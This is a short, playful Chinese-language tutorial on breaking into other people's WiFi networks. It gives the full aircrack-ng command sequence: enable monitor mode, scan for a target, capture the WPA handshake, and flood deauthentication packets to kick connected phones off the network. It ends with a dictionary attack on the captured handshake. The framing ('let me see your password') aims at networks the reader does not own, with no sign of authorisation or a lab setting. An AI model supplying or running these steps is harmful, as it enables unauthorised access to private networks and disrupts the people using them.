芝士甚么?WIFI密码!

芝士甚么?让俺看看你的密码!

扎上你的网卡
airmon-ng start wlan0 开启监听模式
airodump-ng wlan0mon 扫描附近网络,找到目标
锁定目标mac地址,开始抓取握手包
airodump-ng -c 6 --bssid mac地址 -w 抓包存储的路径(如home) wlan0mon (-c后面的数字是信道,即“CH”)
再打开一个终端
aireplay-ng --deauth 1000 -a mac地址 wlan0mon 或者 aireplay-ng -0 0 -c 连接到wifi的手机mac地址 -a mac地址 wlan0mon (把设备踹下线)
抓取握手包的终端出现WPA handshake时,表示抓包成功
两边终端都ctrl+c停止,结束攻击
then:

  1. 把握手包导入跑包软件(比如wifipr)
  2. aircrack-ng -w 字典路径 握手包路径 回车后开始跑字典
    然后耐心等待结果sa~

a,对了,复杂密码可能耗时巨大或者跑不出来sa.